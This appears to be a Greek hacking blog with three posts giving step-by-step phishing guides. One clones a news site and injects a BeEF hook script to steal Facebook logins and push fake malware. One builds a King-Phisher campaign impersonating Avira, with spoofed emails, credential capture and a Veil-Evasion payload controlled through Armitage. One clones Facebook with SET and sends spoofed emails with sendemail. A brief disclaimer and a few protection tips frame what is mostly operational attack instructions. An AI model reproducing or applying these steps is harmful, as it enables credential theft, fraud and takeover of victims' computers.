ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Εμφάνιση αναρτήσεων με ετικέτα Phishing. Εμφάνιση όλων των αναρτήσεων
Εμφάνιση αναρτήσεων με ετικέτα Phishing. Εμφάνιση όλων των αναρτήσεων

Πέμπτη 1 Δεκεμβρίου 2016

Πως εκμεταλλευομαστε τα κοινωνικα δρωμενα για μια στοχευμενη επιθεση (Black Hat Method)



Tι θα χρεαστειτε;

1.Kali Linux
2.BeEF
3.Veil-Evasion
4.Domain name
5.Μυαλο

Σε αυτον τον οδηγο θα μαθουμε την τεχνη της κοινωνικης μηχανικης και πως μπορουμε να εκμεταλευτουμε τα κοινωνικα δρωμενα μιας χωρας ωστε να εφαρμοσουμε κακοβουλα τον σκοπο μας.Θα ειναι συντομος οδηγος και με λιγες λεπτομερειες καθως θελω να σας δειξω την μεθοδο και οχι την εγκατασταση αυτης της επιθεσης.

Αυτη την στιγμη τα κοινωνικα δρωμενα της χωρας ειναι οι λεξεις κλειδια

Τελη κυκλοφοριας
Donald Trump
Barack Obama
Φορος ΕΝΦΙΑ
και Black Friday

Απο τα παραπανω αν φτιαξω εναν δολο σε ιστοσελιδα, θα στοχευσω μια συγκεκριμενη ομαδα ατομων μια καποια μικρη αποκλιση

δλδ αν φτιαξω μια ιστοσελιδα με τιτλο  "Τοσο πρεπει να πληρωσετε αν εχετε 150 τετραγωνικα και πανω!!!!" η "ο Νεος φορος ΕΝΦΙΑ" θα τραβηξω ηλικιες απο 28-60+

η αν φτιαξω μια ιστοσελιδα με τιτλο "Πανικος στα πολυκαταστηματα!!!80% οι τσαντες louis vitton" προφανως θα στοχευσω καθαρα γυναικες ηλικιας 18 εως 38+
πιστευω οτι εχετε καταλαβει πως να στοχευετε συγκεκριμενα ατομα κτλ

εγω στο παραδειγμα μου θα χρησιμοποιησω ,μιας και σημερα που γραφω τον οδηγο ειναι παρασκευη τις εκπτωσεις Black friday που εγινε σαλος στην Ελλαδα....

οποτε κανω μια αναζητηση "Black Friday" και βρισκω μια οποιαδηποτε ιστοσελιδα που να λεει καποιο αρθρο

πχ





τωρα προφανως δεν προκειτε να κατσω να γραψω ολοκληρη ιστοσελιδα οποτε σε αυτο θα με βοηθησει το εργαλειο httrack το οποιο ειναι ενα εργαλειο που αντιγραφει ιστοσελιδες για offline αναγνωση.

οποτε εγω επελεξα την ιστοσελιδα ταδε και πηγα στο αρθρο για black friday



οποτε τρεχω την εντολη httrack oloklhro_to_url_ths_istoselidas_me_to_arthro -o /root/var/html/istoselida

και το httrack αντιγραφει ολη την ιστοσελιδα στον φακελο του apache server


τωρα καταχωρουμε ενα domain name και το ανακατευθυνουμε στην εξωτερικη ip μας επισεις προωθουμε την θυρα 3000 και θυρα 80 στην εσωτερικη  ip μας

αυτο το πως θα το κανετε δειτε σε προηγουμενους οδηγους

τωρα πηγαινουμε και βρισκουμε το αρχειο index.html και προσθετουμε μετα το </body>


<script type="text/javascript" src="http://domainname:3000/hook.js"></script>

και οπως καταλαβαινετε θα χρησιμοποιησουμε το Browser Explotation Framework (BeEF) στα kali linux υπαρχει η εκδοση 4.6.0-Alpha εγω χρησιμοποιω την εκδοση 4.7.0-Aplha οπως και να εχει δεν ειναι ο σκοπος του οδηγου μου για να μαθουμε πως το κανουμε εγκατασταση .Απλα στην 4.6.0-Alpha

πριν ξεκινησουμε γραφουμε σε ενα τερματικο leafpad /usr/share/beef-xss/modules/persistence/man_in_the_browser/config.yaml

και προσθετουμε


τωρα αν ενα θυμα ενωθει και παει σε αλλο αρθρο θα συνεχισουμε να τον εχουμε σαν zombie χωρις να επιλεξουμε αυτοματα man in the browser σχετικα με το beEF θα δειτε σε προηγουμενο οδηγο μου.

τωρα οσοι εχετε την εκδοση 4.7.0 απλα θα τρεξετε την εντολη
cp /root/beef/arerules/man_in_the_browser.json /root/beef/arerules/enabled/

η οποια αυτη η εντολη θα μεταφερει το αρχειο json με την λειτουργια man in the browser και οταν ξεκινησετε το beef θα την τρεχει αυτοματα

τωρα αλλαζουμε λιγο επικεφαλιδα και τιτλο στο αρχειο index.html ωστε να το κανουμε ποιο πικαντικο πχ


 τωρα εφοσον τα εχουμε αλλαξει ολα μας μενει να κανουμε την επιθεση

αν θελετε να βαλετα αυτοματα να κλεβει κωδικους facebook δημιουργουμε ενα εγραφο κειμενου και βαζουμε τις εξεις γραμμες

{"name": "Phising",
  "author": "nickthesail0r",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "pretty_theft",
    "condition": null,
    "options": {
      "choice": "Facebook",
      "backing": "Grey",
      "imgsauce": "http://best-page.ga:3000/ui/media/images/beef.png"
    }
  }],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"

το αποθηκευουμε σαν phising.json και το βαζουμε στο φακελο του beef (εκδοση 4.7.0) arerules/enabled

αν θελετε στο φακελο arerules εχει και το win_fake_malware.json
αυτο το ανοιγουμε και αλλαζουμε το url με το url του κακοβουλου αρχειου μας
*εννοειτε οτι εχουμε φτιαξει καποιο κακοβουλο αρχειο και εχουμε προωθησει τις αναλογες θυρες στο router μας


ξεκιναμε το beef με την εντολη ./beef οταν ειμαστε στον φακελο beef

πχ


κανουμε μια δημοσιευση της σελιδα μας στο facebook και περιμενουμε......

οταν τα θυματα πανε στην ιστοσελιδα μετα απο λιγο θα τους εμφανιστει να βαλουν τα στοιχεια του facebook


και αν καποιος μπει απο windows θα δει αυτο και θα κατεβασει το κακοβουλο αρχειο


Με λιγα λογια σε αυτον τον οδηγο απλα μαθαμε πως να πραγματοποιουμε μια επιθεση με την τεχνη της κοινωνικης μηχανικης.....σε παλιοτερους οδηγους μου θα δειτε τι μπορειτε να κανετε με το BeEF και πως μπορειτε να το εκμεταλευτειτε.
Σας συνιστω να διαβασετε το ARE (Autorun Rule Engine) του BeEF ετσι ωστε να μπορεσετε να φτιαξετε την επιθεση στα μετρα σας.

Τρίτη 22 Νοεμβρίου 2016

Πως φτιαχνουμε μια εκστρατεια ψαρεματος (King-Phisher)




Σε αυτο τον οδηγο θα μαθουμε να χρησιμοποιουμε το εργαλειο King-Phisher και με αυτο να φτιαξουμε μια εκστρατεια ψαρεματος

Τι θα χρειαστειτε;

1.Kali Linux
2.King-Phisher
3.Ενα Domain Name
4.SMTP server

To King-Phisher υπαρχει στην νεα εκδοση του Kali Linux αλλα υπαρχει καποιο προβλημα με τα πακετα εμεις θα το κανουμε εγκατασταση απο την αρχη
οποτε το κατεβαζουμε με την εντολη git clone
ανοιγουμε ενα τερματικο και γραφουμε

cd opt/

ωστε να παμε στον συγκεκριμενο φακελο

με την εντολη

git clone https://github.com/securestate/king-phisher.git

το κατεβαζουμε στον συγκεκριμενο φακελο

τωρα μενει να το κανουμε εγκατασταση

οποτε γραφουμε στο τερματικο

king-phisher/tools/install.sh και επιλεγουμε y


οταν τελειωσει η εγκατασταση μας τρεχει αυτοματα o server του king-phisher και εμεις με την εντολη    python3 /opt/king-phisher/KingPhisher τρεχουμε τον client

*αν δεν σας εχει ξεκινησει ο server του king-phisher τρεξτε την εντολη                                                                                                                             
 python3 /opt/king-phisher/KingPhisherServer /opt/king-phisher/server_config.yml
η systemctl start king-phisher
*systemctl  disable king-phisher ετσι ωστε οταν ξεκινατε τα kali linux και θελετε να τρεξετε τον apache server να μην τρεχει το King-phisher γιατι ακουει στην θυρα 80
το ξεκινατε με 
systemctl start king-phisher

επισεις τρεξτε την εντολη leafpad /opt/king-phisher/server_config.yml

και αλλαζουμε την διαδρομη /var/www σε /var/www/html
πχ
 

ξεκιναμε το king-phisher με την εντολη

python3 /opt/king-phisher/KingPhisher

βαζουμε τα κριτηρια συνδεσης μας αυτα που κανουμε δλδ login στα kali linux


και μας παει εδω για να δημιουργησουμε την εκστρατεια μας


κανουμε μια παυση εδω.......

Πχ η δικια μου εκστρατεια ειναι να κλεψω τα κριτηρια συνδεσης και να μολυνω υπολογιστες

οποτε παω στο hostinger ,φτιαχνω ενα λογαριασμο επιλεγω ενα domain name αναλογα με τι επιθεση θελω να κανω και ανακατευθυνω το domain name στην εξωτερικη μου ip

δειτε σε παλιοτερους οδηγους πως
πχ η ανακατευθυνση


 οποτε το domain name μου ειναι avira.hol.es
τωρα εφοσον τα εχετε φτιαξει αυτα συνεχιζουμε με το king-phisher

επιλεγουμε New Campaign


 επιλεγουμε next

 εδω βαζουμε το ονομα της εκστρατιας μας και την περιγραφη


εδω αν θελουμε βαζουμε αν ενα θυμα επισκευθει για δευτερη φορα την σελιδα να μην μπορει να ξαναμπει ετσι ωστε να μην του κινησουμε υποψιες


περιγραφη της ετερειας πχ Avira Antivirus αν θελετε βαζετε τα στοιχεια


εδω βαζετε ποσο θελετε να κρατησετε την εκστρατεια δλδ ποσο καιρο να μαζευει στοιχεια κτλ

και τελος
επιλεγουμε την εκστρατια μας


και βλεπουμε τις ρυθμισεις που πρεπει να βαλουμε για να τρεξει η εκστρατια μας

πριν τις συμπληρωσουμε τρεχουμε την εντολη

git clone https://github.com/nickthesail0r/King-Phisher-Avira-Update.git

με αυτη την εντολη κατεβαζουμε την σελιδα που τροποποιησα εγω για το avira
*αλλαξτε την αναλογα με τις αναγκες σας

με την εντολη

mv '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/failed' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/images' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/include' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/login' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/scan' /var/www/html

μεταφερουμε τα αρχεια στην διαδρομη /var/www/html

αυτο το κανετε και με copy paste πχ

τρεχουμε την εντολη

ls /var/www/html

και πρεπει να εχουμε αυτα τα αρχεια

τωρα πηγαινουμε στο router μας και προωθουμε την θυρα 80 στην εσωτερικη μας ip δειτε παλιοτερους οδηγους πως

πηγαινουμε στο King-Phisher παλι και γραφουμε το domain name μας /login

μετα επιλεγουμε Verify URL

αν ολα ειναι σωστα τοτε


 στην συνεχεια μας μενει να ρυθμισουμε τον SMTP server

παταμε εδω και κανουμε εγραφη

μετα επιλεγουμε SMTP και More Settings


 σημειωνουμε τα εξεις στοιχεια


δλδ το email σας τον κωδικο και smtp-pulse.com:2525

πηγαινουμε στο King-Phisher και βαζουμε στο Source Email(SMTP)το ιδιο email που φτιαξαμε λογαριασμο στο SendPulse
στο Source Email(MIME) βαζουμε το ψευτικο email αποστολεα
στο Friendly Allias ενα ψευτικο ονομα αποστολεα
και στο Subject To θεμα του email

μετα πηγαινουμε στην καρτελα Edit

και γραφουμε τις εξεις γραμμες

<html>
</body>
<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>
<br>
Special offer upgrade for Free your Avira antivirus
<br>
<a href="{{ url.webserver }}">Click Here</a>
<br>
<br>
{{ sender.friendly_alias }}
<br>
<br>
{{ sender.email }}
<br>
{{ tracking_dot_image_tag }}
</body>
</html>
εσεις βαζετε το domain σας στην γραμμη

<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>

επιλεγουμε preview θα μας πει να το αποθηκευσουμε και βλεπουμε τι εχουμε φτιαξει

πηγαινουμε παλι στην καρτελα configure και επιλεγουμε την λιστα με τα email που θελουμε να επιτεθουμε


απο το Veil-evasion δημιουργουμε εναν ιο και τον ονομαζουμε Αvira_Antivirus_v3.37.exe
τον μεταφερουμε στην διαδρομη /var/www/html
*δειτε σε προηγουμενους οδηγους πως
στο αρχειο failed θα δειτε το href για να βαλετε την διαδρομη με το domain σας
πχ

μετα ξεκιναμε το armitage και το βαζουμε να ακουει στην θυρα που δημιουργησαμε τον ιο
*μην ξεχασετε να προωθησετε την θυρα στο router

πηγαινουμε μετα στην καρτελα send και επιλεγουμε start


βαζουμε τα στοιχεια


και το King Phisher στελνει το email

στο ηλεκτρονικο ταχυδρομειο του θυματος θα του εμφανιστει αυτο


οταν πατησει στο μνμ θα τον ανακατευθυνει εδω


το θυμα θα βαλει τα κριτηρια συνδεσης του για να κανει login
και θα τον ανακατευθυνει εδω στο ψευτικο update


μετα το ψευτικο σφαλμα


οταν πατησει download και κατεβασει τον ιο τοτε θα τον δειτε σαν slave
στο armitage απο εκει και περα θα μπορειτε να κανετε οτι θελετε στον υπολογιστη του

επιστρεφουμε στο King-Phisher στην καρτελα View Campaign

εδω βλεπουμε το ποσοστο επιτυχειας λειτουργικα κτλ


εδω βλεπουμε την εξωτερικη ip των θυματων email και αν πατησανε στο email που στειλαμε

εδω βλεπουμε ποιος πηγε στην σελιδα ψαρεματος πχ βλεπουμε εξωτερικη ip ,τοποθεσια ,email και απο ποιο προγραμμα περιηγησης μπηκε

τελος βλεπουμε τα κριτηρια συνδεσης του


το King-phisher μπορειτε να το χρησιμοποιησετε και χωρις να στειλετε καποιο email απλα μονο το link του domain σας βεβαια πρεπει να αλλαξετε στο αρχειο server_config.yml

την εξεις γραμμη απο true σε false

 
Γενικα το King-Phisher ειναι ενα παρα πολυ καλο εργαλειο για να ψαρευετε μαζικα η να μαζευετε διαφορες πληροφοριες αναλογα με τις αναγκες σας


Πως θα προστατευτειτε;

Παντα να κοιτατε το ονομα του Domain πχ στο παραδειγμα της δικιας μου εκστρατιας το πραγματικο ειναι www.avira.com και το δικο μου ειναι www.avira.hol.es
Αν δεν ειστε σιγουροι για την προελευση ενος μηνυματος η μιας ιστοσελιδας απλα μην την επισκευθειτε η βαλτε λανθασμενα στοιχεια συνδεσεις πχ αν βαλετε λανθασμενα στοιχεια συνδεσεις και δεν σας πει οτι ειναι λαθος τοτε ειναι σελιδα ψαρεματος....απλη λογικη

Σάββατο 14 Φεβρουαρίου 2015

Πως κλεβουμε κωδικους Facebook(Expert Facebook Phising)



Τι θα χρειαστειτε;

1.Kali Linux

Πριν ξεκινησουμε παταμε εδω

Δημιουργουμε ενα λογαριασμο
Οταν κανετε επιβεβαιωση λογαριασμου τοτε επιλεξτε φιλοξενια


επιλεγουμε Δωρεαν και παραγγελια
δινουμε οποιοδηποτε ονομα στο sub domain βαζουμε κωδικο,επιλεγουμε συνεχεια


Επιλεγουμε Δεχομαι τους Ορους και μετα παραγγελια


θα μας εμφανισει οτι ο λογαριασμος δημιουργηθηκε επιτυχως


μετα ανοιγουμε ενα τερματικο και γραφουμε

curl ifconfig.me

ωστε να δουμε ποια ειναι η εξωτερικη μας ip


*σημειωνουμε καπου αυτη την ip πχ 189.χχ.χχ.χχ.45
μετα γραφουμε

ifconfig

ωστε να δουμε την εσωτερικη μας ip


*σημειωνουμε καπου την εσωτερικη μας ip πχ 192.168.1.20

πηγαινουμε στο router  μας ,εκει που λεει Firewall επιλεγουμε dmz ,δεξια βαζουμε την εσωτερικη μας ip και αποθηκευουμε την ρυθμιση


*μπορειτε να προωθησετε την θυρα 80 αν δεν εχει dmz το router σας*

τωρα ανοιγουμε ενα τερματικο και γραφουμε setoolkit

επιλεγουμε 1) Social-Engineering Attacks)

επιλεγουμε 2) Website Attack Vectors

επιλεγουμε 3) Credential Harvester Attack Method

επιλεγουμε 2) Site Cloner

βαζουμε την εξωτερικη μας ip

 γραφουμε την ιστοσελιδα που θελουμε να αντιγραψουμε


το SET αντιγραφει το facebook και ανοιγει τον apache web server μας


τωρα για να επιβεβαιωσουμε οτι ολα ειναι ενταξει γραφουμε στην url την εσωτερικη μας ip και θα μας ανοιξει την σελιδα τοπικα πχ


τωρα πηγαινουμε στο hostinger και αντιγραφουμε το domain που εχουμε φτιαξει

πχ

στο τερματικο γραφουμε

nano /var/www/index.html

παταμε ctrl+w και μετα ctrl+R ωστε να κανουμε αναζητηση και αντικατασταση
γραφουμε την εξωτερικη μας ip πχ http://1.xx.xx.xx.4/post.php

παταμε enter και γραφουμε το domain που φτιαξαμε με το hostinger πχ http://domain_diko_sas/post.php

παταμε παλι enter μας εχει βρει την ip και επιλεγουμε Y για να γινει αντικατασταση

παταμε ctrl+x για να κλησει ,θα μας ρωτησει αν θελουμε να αποθηκευτει παταμε Y και enter

 τωρα πηγαινουμε στο hostinger στις επιλογες πηγαινουμε προχωρημενο και  μετατροπεας DNS ζωνης

στο A(Host) στη πρωτη γραμμη (@) επιλεγουμε επεξεργασια κατω που λεει point to και βαζουμε την εξωτερικη μας ip πχ


μετα βαζουμε στην url το domain μας και μας ανοιγει την ψευτικη σελιδα του facebook πχ

 *αν δεν μας την ανοιξει η το A record δεν εχει μεταφερθει στην ip μας απο το hostinger ,η δεν εχετε προωθησει την θυρα 80 στο router*

τωρα παλι στις επιλογες του  hostinger πηγαινουμε στην διαχειριση email βαζουμε ενα ονομα κωδικο και επιλεγουμε δημιουργια

και οταν δημιουργηθει επιτυχως

κραταμε το email και τον κωδικο μας

Τωρα για να αρχισουμε την επιθεση κατεβαζουμε 2 αρχεια.txt

1.κειμενο αναφορας πατηστε εδω
2.αιτημα φιλιας πατηστε  εδω

τωρα εφοσον εχουμε κατεβασει και τα 2 αρχεια κειμενου (.txt) τα μεταφερουμε στην επιφανεια εργασιας μας

ανοιγουμε ενα τερματικο και γραφουμε

nano /root/Desktop/accountverification.txt

παταμε ctrl+w μετα ctrl+R και γραφουμε onoma_tou_domain_sas πχ


για παραδειγμα το δικο μου

θα μας ρωτησει αν θελουμε να κανουμε αντικατασταση και εμεις θα επιλεξουμε A (για ολα) μετα παταμε ctrl+x επιλεγουμε y και παταμε enter για να αποθηκευση

το ιδιο κανουμε και με το αλλο αλλο αρχειο τρεχουμε την εντολη

nano /root/Desktop/friendrequest.txt

και ακολουθουμε την ιδια διαδικασια ωστε να κανετε αντικατασταση κτλ

τωρα γραφουμε στο τερματικο

sendemail -f "Facebook <facebook@mailfacebook.com>" -t thyma@gmail.com -u Facebook -o message-file=/root/Desktop/accountverification.txt -o message-content-type=html -s mx1.hostinger.gr:2525 -xu friend@acceptfriend.wc.lt -xp κωδικος


οπου
-f "ονομα <email αποστολεα>" *βαζετε οτι θελετε*
-t email θυματος
-u Θεμα του  μηνυματος
-ο massage-file=ετοιμο αρχειο κειμενου
-ο massaage-content-type=html δλδ οτι το ετοιμο μηνυμα που καταβασατε οτι ειναι html
-s mx1.hostinger.gr:2525 διακομηστης και θυρα (στο hostinger ειναι τα ιδια)
-xu χρηστης (εσεις βαζετε το email που φτιαξατε με το hostinger)
-xp ο κωδικος που βαλατε οταν φτιαξατε το email στο hostinger

στο email του θυματος στα εισερχομενα θα του εμφανιστει αυτο


και αν παλι στο τερματικο γραψουμε


στο email του θυματος θα του εμφανιστει αυτο


τωρα αν το θυμα πατησει σε ενα απο τους 2 συνδεσμους θα ανακατευθυνθει στην ψευτικη σελιδα του facebook πχ


οταν πληκτρολογισει τα κρητηρια συνδεσης του θα μας αποθηκευτουνε

για να τα δουμε απλα γραφουμε σε ενα τερματικο

cat /var/www/harvester*.txt



Πως θα προστατευτειτε;

1.Παντα να κοιτατε την url αν δεν λεει https://www.facebook.com τοτε δεν ειναι το facebook
2.Αν παρετε καποιο email επιλεξτε  Show origin για να δειτε απο που ηρθε αυτο το email και αν εχει περασει το SPF


και οπως βλεπετε ο αποστολεας δεν εχει περασει το SPF (Sender Policy Framework)και δεν ειναι καθορισμενος αποστολεας
Το SPF record με λιγα λογια ειναι οι εγγραφες που εχει ο καθε ιδιοκτητης Domain για να αφηνει μια ip να στελνει email για αυτον πχ το www.facebook.com εχει δικιες του προκαθορισμενες ip, αυτο το κανουνε για μειωσουνε τους spammers,hackers  κτλ
στο δικο μας παραδειγμα ποιο πανω δεν υπαρχει καποιο SPF record οποτε γιαυτο εβγαλε none και πηγε το email πχ